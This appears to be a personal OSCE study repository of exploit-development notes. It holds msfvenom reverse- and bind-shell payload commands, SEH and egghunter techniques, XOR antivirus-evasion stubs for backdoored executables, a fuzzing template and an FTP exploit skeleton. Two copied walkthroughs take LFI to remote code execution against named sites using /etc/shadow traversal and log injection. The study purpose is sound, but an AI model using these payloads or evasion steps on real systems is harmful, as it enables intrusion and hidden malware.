├── 2liner-badchars ├── x86 ├── SystemCallTable ├── Windows-API-Index ├── DataTypes ├── simulator └── Instructions, Mnemonics, Operands, Opcodes ├── Fuzz └── Boo-Fuzz │ ├── Document │ └── templates │ ├── tftp.fuzz.py │ ├── Exploit_FTP.py │ └── BooFuzz_FTP.py ├── Hex-To-Raw-ONELINER ├── WaitForSingleObject-MSFVENOM ├── x86_short_jump_cheat_sheet.pdf ├── Bypass-AntiVirus ├── av-detection-techniques ├── Tools ├── Polymorphic-Shellcode ├── Methods ├── Problem-WaitForSingleObject ├── XOR-Math-XOR ├── SimpleCustomEncoderDecoder ├── XOR-Encoding-Double-CodeCave ├── Questions-To-Ask ├── Bypass-Kaspersky-2017-XOR-Stub └── SLAE-Custom Encoder–7 ├── Shellcode-To-LittleEndian ├── Zero-Out-EAX ├── WebExploitation ├── XSS to Cookie Stealing to RCE, Chart.png ├── LFI │ ├── Links │ ├── LFI-RCE-Overview │ ├── LFI-RCEviaREFERER-Header │ ├── LFI-RCE-via-access_log-injection │ ├── LFI-RCEviaPHPSessions │ └── LFI-Testing-Techniques ├── XSS-LFI ├── Xss-To-CSRF └── WordPress5.1-XSS+CSRF+RCE ├── README.md ├── seh-exploit-methods ├── Transfer-Files-Using-RDesktop ├── Offset-Reminder ├── Shellcoding ├── venetian shellcode ├── What-Is-A-Socket ├── Null-Free Byte Shellcode common instructions └── API-Refresher ├── obfuscating-NOPsled ├── Egghunter ├── Encoding-Egghunter-Using-MSF ├── Egghunter-AccessViolation └── Win32-Egghunter ├── ASLR ├── Backdoor-PE ├── Buffer-Overflow └── HowToBypass ASLR Corelean.be ├── Jump-Back-512 Bytes ├── socketReuse ├── Socket-Reuse-Overview └── recv ├── Worst-Case-Scenario ├── EIP-ESP-TooClose ├── BufferRegister-Option-MSFvenom ├── Tools ├── HTTP-Store-Shell-In-Different-Fields ├── backdoorPE ├── ASLR-Enabled Binaries ├── User-Interaction+Codecaves ├── Basic-New-Section-Method ├── Extreme-Backdoor-PE └── ALR-Bypass Backdoor PE ├── msfvenom-cheatsheet ├── Metasploit-EXITFUNC ├── Exploiting-Cisco-Routers ├── MAC-Bypassing-ACL ├── TCP Session Hijacking ├── Part-1 └── SNMP-ConfigurationAttack-With-A-GRE-Tunnel ├── Change-Offset-Rebased-Modules ├── Sub-Encoding ├── Useful-Links ├── mona-cheat-sheet ├── SLAE Assignment 3–Egg Hunter ├── Jumping-to-Shellcode └── SmallReverseShell /2liner-badchars: -------------------------------------------------------------------------------- 1 | for i in range(1, 256): 2 | buffer += chr(i) 3 | -------------------------------------------------------------------------------- /x86/SystemCallTable: -------------------------------------------------------------------------------- 1 | https://j00ru.vexillium.org/syscalls/nt/32/ 2 | -------------------------------------------------------------------------------- /Fuzz/Boo-Fuzz/Document: -------------------------------------------------------------------------------- 1 | https://buildmedia.readthedocs.org/media/pdf/boofuzz/latest/boofuzz.pdf 2 | -------------------------------------------------------------------------------- /x86/Windows-API-Index: -------------------------------------------------------------------------------- 1 | https://docs.microsoft.com/en-us/windows/win32/apiindex/windows-api-list 2 | -------------------------------------------------------------------------------- /Hex-To-Raw-ONELINER: -------------------------------------------------------------------------------- 1 | cat egghunter.txt | tr -d '"' | tr -d '\n' | tr -d '\\x' | xxd -r -p > egghunter.bin 2 | -------------------------------------------------------------------------------- /WaitForSingleObject-MSFVENOM: -------------------------------------------------------------------------------- 1 | See here: 2 | https://gist.github.com/mgeeky/2193d0416e3c4ce49996ee6616e0bf0b 3 | -------------------------------------------------------------------------------- /x86_short_jump_cheat_sheet.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/e-a-security/Exploit-Dev-OSCE/HEAD/x86_short_jump_cheat_sheet.pdf -------------------------------------------------------------------------------- /Bypass-AntiVirus/av-detection-techniques: -------------------------------------------------------------------------------- 1 | Source: https://pentest.blog/art-of-anti-detection-1-introduction-to-av-detection-techniques/ 2 | 3 | -------------------------------------------------------------------------------- /Bypass-AntiVirus/Tools: -------------------------------------------------------------------------------- 1 | + Mutlibyte XOR or AES encrypted shellcode 2 | https://github.com/Arno0x/ShellcodeWrapper 3 | 4 | -------------------------------------------------------------------------------- /Shellcode-To-LittleEndian: -------------------------------------------------------------------------------- 1 | echo $shellcode | sed s/"\x"/""/g | fold -w2|tac|tr -d "\n"| sed 's/(..)/\1\x/g' | sed 's/.{2}$//' | awk '$0="\x"$0 2 | -------------------------------------------------------------------------------- /Zero-Out-EAX: -------------------------------------------------------------------------------- 1 | Quick and easy 2 | 3 | buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010 4 | buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101 5 | -------------------------------------------------------------------------------- /WebExploitation/XSS to Cookie Stealing to RCE, Chart.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/e-a-security/Exploit-Dev-OSCE/HEAD/WebExploitation/XSS to Cookie Stealing to RCE, Chart.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | A repo that tried to centralize the time I learned the introductory to exploit development while studying for the OSCE (Offensive Security Certified Expert) certification. 2 | -------------------------------------------------------------------------------- /WebExploitation/LFI/Links: -------------------------------------------------------------------------------- 1 | LFI cheat sheet by Highon.coffee https://highon.coffee/blog/lfi-cheat-sheet/ 2 | 3 | BURP Payload LFI: https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI 4 | -------------------------------------------------------------------------------- /x86/DataTypes: -------------------------------------------------------------------------------- 1 | Fundemental Data Types: 2 | 3 | Byte - 8 bits 4 | Word - 16 bits 5 | Double Word - 32 bits 6 | Quad Word - 64 bits 7 | Double Quad Word - 128 bits 8 | -------------------------------------------------------------------------------- /seh-exploit-methods: -------------------------------------------------------------------------------- 1 | 2 ways: 2 | 3 | a) Find a POP POP RET pointer in a DLL that is not compiled with SafeSEH (Application DLL's or, if no other option, OS DLL) 4 | b) use a POP POP RET pointer from the application itself, assuming that the application bianry is not SafeSEH compiled 5 | -------------------------------------------------------------------------------- /Bypass-AntiVirus/Polymorphic-Shellcode: -------------------------------------------------------------------------------- 1 | Polymorphism is the concept of replacing instructions with equal functionality, to defeat these detection methods. 2 | Additionally, garbage instructions that do not change functionality (NOP or NOP equivalents) can also be used. 3 | 4 | More to come 5 | -------------------------------------------------------------------------------- /Transfer-Files-Using-RDesktop: -------------------------------------------------------------------------------- 1 | Linux: 2 | rdesktop -r disk:tmp=/home/user/Desktop 3 | 4 | On your Windows machine: 5 | My Computer --> Hard Disk Drivers --> Other --> "tmp on kali" --> Paste the files you want to transfer to your kali machine (or grab files that you put from your Kali) 6 | -------------------------------------------------------------------------------- /Offset-Reminder: -------------------------------------------------------------------------------- 1 | Keep in mind that sometimes the exploit is contingent on path, 2 | and as such you need to make sure offsets stay intact based on 3 | your username, the following is the path used while developing the exploit (default on Windows 7): 4 | [C:\Users\IEUser\AppData\Roaming\10-strike\Network Inventory\cfg\] 5 | -------------------------------------------------------------------------------- /x86/simulator: -------------------------------------------------------------------------------- 1 | x86 simulator: Super useful for quickly checking and adjusting calculations 2 | for the alphanumeric shellcode techniques described in module 8 of the PDFs. 3 | 4 | You’ll want to click on ‘windows’ in the upper right and then check off registers 5 | 6 | http://carlosrafaelgn.com.br/asm86/index.html?language=en 7 | -------------------------------------------------------------------------------- /Shellcoding/venetian shellcode: -------------------------------------------------------------------------------- 1 | https://xavibel.com/2019/08/31/seh-based-local-buffer-overflow-dameware-remote-support-v-12-1-0-34/ 2 | 3 | https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/ 4 | 5 | https://github.com/ajinabraham/Exploit-Research-Ported/blob/master/unicode%20quick%20player%201.2.py 6 | -------------------------------------------------------------------------------- /obfuscating-NOPsled: -------------------------------------------------------------------------------- 1 | Incrementing or decrementing the register before our code executes will not change the desired operation. 2 | 3 | inc eax 0x40 4 | inc ebx 0x43 5 | inc ecx 0x41 6 | inc edx 0x42 7 | dec eax 0x48 8 | dec ebx 0x4B 9 | dec ecx 0x49 10 | dec edx 0x4A 11 | -------------------------------------------------------------------------------- /Egghunter/Encoding-Egghunter-Using-MSF: -------------------------------------------------------------------------------- 1 | Copy the generated bytes into a text file and convert it into a binary file using xxd: 2 | 3 | cat egghunter.txt 4 | 5 | ------------ 6 | cat egghunter.txt | xxd -r -p > egghunter.bin 7 | ------------ 8 | Now, we need to use an encoder to ensure only ASCII printable characters are actually used. (for example) 9 | 10 | msfvenom -e x86/alpha_mixed bufferregister=eax -i egghunter.bin 11 | 12 | 13 | -------------------------------------------------------------------------------- /ASLR/Backdoor-PE: -------------------------------------------------------------------------------- 1 | Need to Hijack an executable but ASLR is going to be changing your Code Cave location? 2 | 3 | You can't hardencode. 4 | However you can find the distand between the locations of where you are and where you want to go and insert a jmp instruction. 5 | 6 | Relative Jump: 7 | JMP (CODE CAVE - ENTRY POINT) 8 | 9 | Restore overwritten functions at the end of your code cave with ASLR: 10 | 11 | ( What you hijacked #1 - What you hijacked #2 ) = (A) 12 | -------------------------------------------------------------------------------- /Jump-Back-512 Bytes: -------------------------------------------------------------------------------- 1 | magic = '\xd9\xee' # fldz 2 | magic += '\xd9\x74\x24\xf4' # fnstenv [esp-0xc] 3 | magic += '\x59' # pop ecx 4 | magic += '\x80\xc1\x05' # add cl,0x5 5 | magic += '\x80\xc1\x05' # add cl,0x5 6 | magic += '\x90' # nop 7 | magic += '\xfe\xcd' # dec ch 8 | magic += '\xfe\xcd' # dec ch 9 | magic += '\xff\xe1' # jmp ecx 10 | -------------------------------------------------------------------------------- /Fuzz/Boo-Fuzz/templates/tftp.fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from boofuzz import * 4 | 5 | def main(): 6 | session = Session( 7 | target=Target( 8 | connection=SocketConnection("IP", 69, proto='udp')),sleep_time = 3) 9 | 10 | s_initialize("Request") 11 | s_binary("0002") 12 | s_string("filename.txt", fuzzable=True) 13 | s_binary("00") 14 | s_string("netascii", fuzzable=True) 15 | s_binary("00") 16 | 17 | session.connect(s_get("Request")) 18 | session.fuzz() 19 | 20 | if __name__ == "__main__": 21 | main() 22 | -------------------------------------------------------------------------------- /socketReuse/Socket-Reuse-Overview: -------------------------------------------------------------------------------- 1 | Very limited buffer space, we can utilize recv() to invoke a stager. 2 | We can then have it add new buffer space at the location you provide it. This will be your soon-to-be reverese shell. 3 | 4 | Potential network libraries that can perform similiar outcomes: 5 | + wininet 6 | + wsock32 7 | 8 | but the process of re-using sockets for those should be along the same process. 9 | 10 | e.g. 11 | - lookup the functions you need on MSDN 12 | - Find where the real calls are made 13 | - Build the shellcode 14 | - Push the arguments 15 | etc. 16 | -------------------------------------------------------------------------------- /Fuzz/Boo-Fuzz/templates/Exploit_FTP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import socket 3 | host = '192.168.1.23' 4 | port = 21 5 | def receive_banner(socket): 6 | socket.recv(1024) 7 | user = "anonymous" 8 | passwd = "anonymous@abcd.com" 9 | command = "" 10 | payload = "" 11 | data1 = "USER " + user + "\r\n" 12 | data2 = "PASS " + passwd + "\r\n" 13 | data3 = command + payload 14 | s = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) 15 | s.connect((host, port)) 16 | receive_banner(s) 17 | s.send(data1) 18 | s.recv(2048) 19 | s.send(data2) 20 | s.recv(2048) 21 | s.send(data3) 22 | s.close() 23 | print "OK" 24 | -------------------------------------------------------------------------------- /Shellcoding/What-Is-A-Socket: -------------------------------------------------------------------------------- 1 | Source: https://www.codeproject.com/Articles/325776/The-Art-of-Win32-Shellcoding 2 | 3 | The communications in any operating system are based on Sockets. 4 | Socket is an endpoint of the communication like your telephone or your mobile and it’s the handle of 5 | any communication inside the OS. 6 | 7 | The socket could be a client and connect to a machine or could be a server. 8 | I’ll not go so deep in this as I assume you know about the client/server communication and about 9 | the IP (the Internet Address) and the Port (a number marks the application which connects to the internet or listen 10 | for a connection). 11 | -------------------------------------------------------------------------------- /Worst-Case-Scenario: -------------------------------------------------------------------------------- 1 | The CTP has got me thinking, what if I'm in a situation that collaborates everything together? 2 | 3 | - Restricted characters 4 | - Small buffer 5 | - Required to bypass AV 6 | - Bypass ASLR/DEP 7 | 8 | ------------------------ 9 | ------------------------ 10 | 11 | How would this work? 12 | 13 | 14 | I think this is where Syscalls and winAPI knowledge comes in handly, you shoudl be able to reduce the payload by reusing anything you can. 15 | 16 | What is happeing around the code you are in? 17 | - Can we leverage: 18 | + Library already loaded? 19 | + Connected already available? 20 | + Socket reuse? 21 | + File Pointer? 22 | -------------------------------------------------------------------------------- /Bypass-AntiVirus/Methods: -------------------------------------------------------------------------------- 1 | - Try renaming a section.. 2 | - XOR encoding 3 | - Using Metasploit Encoders 4 | - Simple NOT Encoder 5 | - Insertion Encoder 6 | - Polymorphism 7 | - Crypters 8 | - Stripping the binary with strip. 9 | - Stripping the broken certificate 10 | - Smallest MSF payload XORed with custom XOR stum 11 | + msfvenom -p windows/shell_reverse_tcp -b "\x00" --smallest 12 | - Chain XOR encoding with a Crypter 13 | 14 | 15 | 16 | 17 | Bypassing Kaspersky 2017 AV by XOR encoding known malware with a twist 18 | + https://blog.m0noc.com/2017/ 19 | 20 | Art of Anti Detection 1 – Introduction to AV & Detection Techniques 21 | https://pentest.blog/art-of-anti-detection-1-introduction-to-av-detection-techniques/ 22 | -------------------------------------------------------------------------------- /WebExploitation/LFI/LFI-RCE-Overview: -------------------------------------------------------------------------------- 1 | Source: 2 | https://resources.infosecinstitute.com/local-file-inclusion-code-execution/ 3 | 4 | Most of the times, what we should focus on, is: 5 | 6 | Server logs (Apache and SSH). 7 | Mail logs 8 | File Upload forms 9 | The /proc/self/environ file 10 | 11 | Every time, we will be trying to inject PHP code inside some server logs to use the LFI attack and thus, execute the code. 12 | We will encounter several difficulties, and this is why we will examine multiple techniques. 13 | Let’s break this down. 14 | 15 | For simplicity’s sake, we will be using the following PHP code as the vulnerable web application: 16 | 17 | 21 | -------------------------------------------------------------------------------- /EIP-ESP-TooClose: -------------------------------------------------------------------------------- 1 | So your reverse shell doesn't execute huh? 2 | 3 | You can see that ESP value is 017EF9D4 and EIP is 017EF219 for example. 4 | That means that there is 7BB of difference between them. EIP can be overwritten and the exploit may not work. 5 | 6 | To fix this I want to do a move of another register to ESP. 7 | I choose ECX because it’s in a middle memory address and also it’s fair away enough of EIP. 8 | 9 | So before our shellcode I do: 10 | 11 | MOV ESP, ECX 12 | “\x8B\xE1” 13 | 14 | 15 | # Notes: 16 | # TRUN A/.:A/ - 2 A's added - Avoid Access Violation Issue 17 | # 8BE1 - MOV ESP,ECX - Fix EIP/ESP issue 18 | # 00402D7B - JMP EAX - EIP overwrite 19 | 20 | 21 | Source: https://xavibel.com/page/2/ 22 | -------------------------------------------------------------------------------- /WebExploitation/XSS-LFI: -------------------------------------------------------------------------------- 1 | PayloadsAllTheThings XSS Injection: 2 | + https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection 3 | 4 | IPCorp 2.1.2 XSS to CSRF to RCE PoC: 5 | + https://www.youtube.com/watch?v=ovhogZGHyMg 6 | 7 | 8 | ----------------------------------------------------------------------------------------- 9 | ----------------------------------------------------------------------------------------- 10 | 11 | 12 | PayloadsAllTheThings File Inclusion: 13 | + https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion 14 | 15 | LFI to RCE Exploit with Perl Script: 16 | + https://www.exploit-db.com/papers/12992 17 | 18 | Testing for Local File Inclusion OWASP: 19 | + https://wiki.owasp.org/index.php/Testing_for_Local_File_Inclusion 20 | 21 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /BufferRegister-Option-MSFvenom: -------------------------------------------------------------------------------- 1 | Let's say you want ASCII-only shellcode: 2 | What register is this shellcode located in? 3 | 4 | When using msfvenom, make sure you set the BufferRegister=INTRUSTION option. 5 | 6 | Why? 7 | + The reason being is that the encoder needs to find where it is in the memory to be able to carry on with 8 | decoding the payload. 9 | Originally, the routines responsible for doing this are not in the ASCII printable set and therefore 10 | would be breaking our payload. 11 | 12 | 13 | Specifying bufferregister option basically tells the encoder not to worry about finding its own 14 | place in memory as we’ll do it beforehand and we’ll put its address in the EAX register. (For example) 15 | 16 | This way, our encoded egghunter is purely ASCII characters only 17 | 18 | 19 | Alphanumeric Shellcode can be found here: https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/ 20 | 21 | -------------------------------------------------------------------------------- /Tools: -------------------------------------------------------------------------------- 1 | PE: 2 | https://github.com/Antonin-Deniau/cave_miner 3 | 4 | Exploit Development 5 | https://github.com/h0mbre/CTP-OSCE/tree/master/Offset 6 | https://github.com/HanseSecure/ExploitDev/tree/master/poc 7 | https://github.com/h0mbre/CTP-OSCE/tree/master/TinyRev 8 | 9 | 10 | Covert your shellcode to a Unicode exploit compatible: 11 | https://github.com/un4ckn0wl3z/Alpha2-encoder 12 | Read how to use it here: https://xavibel.com/page/2/ 13 | 14 | X86 ASSEMBLY SHORT AND CONDITIONAL JUMP CHEAT SHEET 15 | https://vellosec.net/2018/08/x86-assembly-short-and-conditional-jump-cheat-sheet/ 16 | 17 | 18 | Fuzzing: 19 | https://github.com/h0mbre/CTP-OSCE/tree/master/Boo-Gen 20 | 21 | 22 | Simple x86 Assembly to Shellcode Script: 23 | https://vellosec.net/2018/08/simple-x86-assembly-to-shellcode-script/ 24 | 25 | Online x86 / x64 Assembler and Disassembler 26 | https://defuse.ca/online-x86-assembler.htm 27 | 28 | X86 Opcode and Instruction Reference Home 29 | http://ref.x86asm.net/coder32.html 30 | 31 | -------------------------------------------------------------------------------- /HTTP-Store-Shell-In-Different-Fields: -------------------------------------------------------------------------------- 1 | Read more: https://www.fuzzysecurity.com/tutorials/expDev/4.html 2 | 3 | HTTP: 4 | There is a unique quality in HTTP requests that contain buffer overflows. The HTTP request packet contains several “fields”, 5 | not all of them necessary (in fact the packet we are sending in our exploit is already stripped down considerably). 6 | 7 | For the sake of simple explanations lets call these fields 1,2,3,4,5. If there is a buffer overflow in field 1 normally we would assume that field 2 is just an extension of field 1 as if it was just appended to field 1. 8 | 9 | However as we will see these different “fields” will each have a proper location in memory and even though field 1 (or Stage1 in our case) contains a buffer overflow the other fields will, at the time of the crash, be loaded separately into memory. 10 | 11 | Let's see what happens when we inject a metasploit pattern of 1000-bytes in the “User-Agent” field. 12 | 13 | !mona findmsp 14 | -- to verify that your buffer is located in memory 15 | -------------------------------------------------------------------------------- /Bypass-AntiVirus/Problem-WaitForSingleObject: -------------------------------------------------------------------------------- 1 | The shellcode of msfvenom used the WaitForSingleObject function and 2 | the default values prevent the application to execute until the shell is released.\ 3 | 4 | To solve this change the „DEC ESI“ code at the end of the shellcode with a nop. 5 | 6 | ------- 7 | ------- 8 | ------- 9 | ------- 10 | If we look closely, we’ll see that it uses the WaitForSingleObject function. 11 | 12 | WaitForSingleObject function waits until the specified object is in the signaled state or the time-out interval elapses. 13 | 14 | 15 | So after our shellcode spawns a shell with CreateProcessA, it performs a call to WaitForSingleObject before 16 | continuing to block_exitfunk.asm. 17 | In this call, it pushes the timeout first(-1 : INFINITE) and then the object handle 18 | (right to left convention), INFINITE is not the right parameter to push in our case; 19 | The program will get stuck until we exit the process created manually. 20 | The solution is simply to change the dec esi instruction to nop 21 | 22 | -------------------------------------------------------------------------------- /Bypass-AntiVirus/XOR-Math-XOR: -------------------------------------------------------------------------------- 1 | ENCODE: 2 | 3 | MOV EAX,00401000 ---------------- # Save start of encoding address in EAX 4 | ADD BYTE PTR DS:[EAX],9 5 | SUB BYTE PTR DS:[EAX], 3 6 | XOR BYTE PTR DS:[EAX],2E ---------------- # XOR the contents of EAX with XOR key 2E 7 | ADD BYTE PTR DS:[EAX],12 8 | SUB BYTE PTR DS:[EAX], 1 9 | XOR BYTE PTR DS:[EAX], 3F 10 | ADD BYTE PTR DS:[EAX], 7 11 | INC EAX 12 | CMP EAX,0040A76F ---------------- # Have we reached the end encoded address? 13 | JLE SHORT 0040A775 ----------------- # If not, jump back to ADD 14 | ... continue with code 15 | 16 | 17 | DECODE: 18 | 19 | 20 | MOV EAX,00401000 21 | SUB BYTE PTR DS:[EAX],7 22 | XOR BYTE PTR DS:[EAX],3F 23 | ADD BYTE PTR DS:[EAX],1 24 | SUB BYTE PTR DS:[EAX], 12 25 | XOR BYTE PTR DS:[EAX], 2E 26 | ADD BYTE PTR DS:[EAX], 3 27 | SUB BYTE PTR DS:[EAX], 9 28 | INC EAX 29 | CMP EAX,0040A76F 30 | JLE SHORT 0040A775 31 | ... continue with code 32 | -------------------------------------------------------------------------------- /backdoorPE/ASLR-Enabled Binaries: -------------------------------------------------------------------------------- 1 | we still need our XOR stub, to encrypt the binary on disk and decode it at runtime. 2 | I made this proof of concept XOR stub that support position independent code, 3 | which uses JMP/CALL/POP and registers to keep track of the encoding routine. 4 | 5 | 013C90E8 JMP SHORT psexec_e.013C90EA ; JMP/CALL/POP technique in action... 6 | 013C90EA CALL psexec_e.013C90EF ; to get hold of EIP... 7 | 013C90EF POP EAX ; and save it EAX 8 | 013C90F0 MOV EDX,EAX ; saves EIP in EDX 9 | 013C90F2 ADD EDX,32 ; EDX stores the shellcode start's RVA 10 | 013C90F5 ADD EAX,186 ; EAX stores the shellcode end's RVA 11 | 013C90FA XOR BYTE PTR DS:[EDX],0F ; same instructions as before 12 | 013C90FD INC EDX 13 | 013C90FE CMP EDX,EAX 14 | 013C9100 JLE SHORT psexec_e.013C90FA 15 | 013C9102 JMP SHORT psexec_e.013C911C 16 | 17 | 18 | We still have to face the challenge of hijacking string references with short 19 | jumps or by other means that do not involve static addressing. 20 | 21 | 22 | Source: https://www.matteomalvica.com/tutorials/av-evasion/ 23 | -------------------------------------------------------------------------------- /x86/Instructions, Mnemonics, Operands, Opcodes: -------------------------------------------------------------------------------- 1 | Opcodes - Tells the processes what operation should be performed. 2 | These make the program actually do stuff. 3 | B8 --> Tells the processor we're going to move something into the EAX register. 4 | B9 --> Tells the processor we're going to move something into the ECX register. 5 | BA --> Tells the processor we're going to move something into the EDX register. 6 | etc. 7 | 8 | Mnemonics - Hand-in-hand with the opcode, term used to scribe an opcode. 9 | So the mnemonic used to secribe the opcode CD is INT, which is an interupt call. 10 | Is INt the mnenomic for the opcode CD? Is CD the opcode for the mnemonic INT? 11 | MOV EAX = B8 --> Mnemonic MOV followed by the argument EAX is equivalent to the opcode EAX. 12 | MOV ECX = B9 13 | etc. 14 | 15 | Operands - "arguments" or "parameters" that directly follow a mnemonic. 16 | Generally speaking, depending upon the mnemonic used there can be 0-3 operands following the mnemonic. 17 | MOV EAX, 1 (EAX, 1 --> Operands) 18 | 19 | Instructions - Comprised of both the mnemonic and any oeprands. 20 | MOV EAX, 1 --> everything is an instruction. 21 | -------------------------------------------------------------------------------- /WebExploitation/LFI/LFI-RCEviaREFERER-Header: -------------------------------------------------------------------------------- 1 | Source: https://medium.com/bugbountywriteup/bugbounty-journey-from-lfi-to-rce-how-a69afe5a0899 2 | 3 | While searching for the vulnerabilities, 4 | I found LFI in the target site- 5 | https://www.victimsite.com/forum/attachment-serve?name=../../../../../../../../../../etc/shadow&path=. 6 | As you can see parameter “name” was vulnerable to LFI. 7 | 8 | Get access to some file may be log files which could provide some user controller input (in order to run some command) . 9 | 10 | So I tried reading access logs ,error logs , different location to access them. 11 | 12 | But it seems the user with which I got LFI didn’t have access to access logs files. 13 | 14 | “/proc/self/fd” provides symbolic shortcut to access logs and various other system related file. 15 | So I tried reading those in search for access logs- 16 | 17 | and I run intruder over /proc/self/fd/{number} and one of the fd files provided me access to access logs — 18 | 19 | 20 | and what caught my attention here was “referer” header because 21 | I knew that it was something which is under user controlled input. 22 | 23 | Time to execute some command. I added ‘referer’ header in the HTTP request , set its value to system(id) and forwarded it- 24 | 25 | We get a good response, and we now have RCE. 26 | -------------------------------------------------------------------------------- /msfvenom-cheatsheet: -------------------------------------------------------------------------------- 1 | How to use msfvenom: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom 2 | 3 | Generating Payloads by Offensive Security: 4 | https://www.offensive-security.com/metasploit-unleashed/generating-payloads/ 5 | 6 | 7 | msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4444 -f c -e x86/alpha_mixed 8 | 9 | How to encode egghunter: 10 | Write your 32-byte egghunter to a binary file: 11 | egghunter, both 126 bytes: 12 | /usr/share/framework2/msfencode -e Alpha2 -i egghunter.bin 13 | msfvenom -p generic/custom PAYLOADFILE=egghunter.bin -e x86/alpha_mixed -b '\x00' -f perl 14 | 15 | Bind shell + alpha_mixed encoding: 16 | msfvenom -e windows/shell_bind_tcp R > bind 17 | msfvenom -e x86/alpha_mixed -i bind -t python 18 | 19 | ------------------------------------------------------- 20 | A quick oneliner to generate encoded egghunter: 21 | msf-egghunter -a x86 -f raw -e w00t -b '\x00' | msfvenom -p - -a x86 --platform windows -b "\x00" -e x86/alpha_mixed -f python 22 | 23 | Convert the output from a script to a .bin file and than cat it through msfvenom: 24 | cat shellcode.bin | msfvenom -p - windows/exec CMD=calc.exe -e ENCODERYOUWANT -f python 25 | ------------------------------------------------------------------ 26 | 27 | EXITFUNC parameter: 28 | 29 | 30 | 31 | BufferRegister parameter 32 | -------------------------------------------------------------------------------- /WebExploitation/LFI/LFI-RCE-via-access_log-injection: -------------------------------------------------------------------------------- 1 | Source: https://medium.com/@p4c3n0g3/lfi-to-rce-via-access-log-injection-88684351e7c0 2 | 3 | Trick to go from Local File Inclusion/File Path Traversal to Remote Code Execution by injecting the access_log. 4 | 5 | have a target http://proqualitycontrol.com/index.php?page=aboutus and it’s vulnerable to LFI/FPT. 6 | Inject the target with ../../../../../../../../../../../../../../../etc/passwd%00 payload. 7 | 8 | Now change with /etc/httpd/conf/httpd.conf. 9 | Not all httpd.conf path is here. 10 | To find the access_log location you need to find httpd.conf first. 11 | 12 | View source (ctrl+u) for a better view of their httpd.conf. 13 | 14 | Open the file called access_log. In this case /home/pro_99/proqualitycontrol.com/access_log. 15 | 16 | 17 | Perl script to inject the access_log: https://pastebin.com/q8jshq1i 18 | 19 | Run it “perl log.pl 80” 20 | 21 | Open the access_log again and search for v0pcr3w. 22 | If the word is there then we’ve successfully injected the access_log. 23 | 24 | Now run this line to execute command on server 25 | /home/pro_99/proqualitycontrol.com/access_log%00&cmd=id 26 | and you’ll see the “id” command executed. 27 | 28 | Our command executed successfully 29 | GET /v0pcr3w uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin). 30 | 31 | -------------------------------------------------------------------------------- /Bypass-AntiVirus/SimpleCustomEncoderDecoder: -------------------------------------------------------------------------------- 1 | Address Hex dump Command 2 | 0040A770 . B8 00104000 MOV EAX,00401000 3 | 0040A775 8000 13 ADD BYTE PTR DS:[EAX],13 4 | 0040A778 . 8030 0F XOR BYTE PTR DS:[EAX],0F 5 | 0040A77B 8000 37 ADD BYTE PTR DS:[EAX],37 6 | 0040A77E . 40 INC EAX 7 | 0040A77F . 3D 6FA74000 CMP EAX,0040A76F 8 | 0040A784 .^ 7E EF JLE SHORT 0040A775 9 | 10 | 11 | Explanation of the Custom Encoder 12 | 13 | 1) First the base (beginning) address is moved into the EAX register. 14 | 2) Then it adds 13 to the byte which EAX is pointing to. 15 | 3) XOR (Exclusive OR) the byte with 0F which EAX is pointing to. 16 | 4) Add 37 to the byte which EAX is pointing to. 17 | 5) Increase EAX to point to the next byte. 18 | 6) Compare EAX with our ending address. 19 | 7) If our ending address hasn’t been reached, jump to (2). 20 | 21 | 22 | With our custom encoder implemented we’re almost done. It should be noted, that we could also 23 | use other opcodes too, to encode our .text section. Such opcodes could be: sub, or, and, etc 24 | 25 | ---------------------------- 26 | Altering the Encoder to a Decoder 27 | 28 | Our initial encoder added 13 to the byte which EAX pointed to, then it XOR’d it with 0F and 29 | added 37 to end with. Now we need to reverse this, by deducting -37 to start with and then -13. 30 | 31 | We will still use the add opcode and of course xor, but we’ll only need to change the values as 32 | mentioned previously 33 | -------------------------------------------------------------------------------- /Bypass-AntiVirus/XOR-Encoding-Double-CodeCave: -------------------------------------------------------------------------------- 1 | Building on: https://github.com/securityELI/CTP-OSCE/blob/master/backdoorPE/User-Interaction%2BCodecaves 2 | 3 | Overview: 4 | 1 - Start of program execution 5 | 2 - Legimiate functionality 6 | 3 - User clicks on web adddr button 7 | 4 - Code Cave 2 (CC2) Encoder/Decodes shellcode 8 | 5 - Code Cave 1 (CC1) Executes shelllcode 9 | 6 - Jumps back to normal execution (#3) 10 | ----------------------------- 11 | 12 | - Hijack execution flow to jump to CC2. 13 | - Save modifications as a file on disk. 14 | 15 | - Now that we are in CC2. before writing our XOR encoder here, 16 | - we will firstly jump to starting address of CC1 and implant our shellcode 17 | so that we get the accurate addresses that we have to use in XOR encoder. 18 | 19 | PUSH ECX, 00477857 // Push the starting address of shellcode to ECX. 20 | XOR BYTE PTR DS:[EAX],0B // Exclusive OR the contents of ECX with key 0B 21 | INC ECX // Increase ECX to move to next addresses 22 | CMP ECX,0047799B // Compare ECX with the ending address of shellcode 23 | JLE SHORT 00479733 // If they are not equal, take a short jump back to address of XOR operation 24 | JMP 7zFM2.00477857 // if they are equal jump to the start of shellcode 25 | 26 | 27 | As we are encoding the opcodes in CC1, we have to make sure the header section in which the CC1 28 | resides is writeable otherwise Ollydbg will show access violation error. 29 | -------------------------------------------------------------------------------- /Bypass-AntiVirus/Questions-To-Ask: -------------------------------------------------------------------------------- 1 | In other words, think outside the box. Some of the best learning is done when you really stretch your mind to think of different possibilities that are outside of what you would consider normal. 2 | This kind of thinking also allows you to bypass assumptions that might have been put in place by developers or manufacturers and is a good skill to have in general as it allows you to flexibly adapt to different situations and craft solutions to them on the 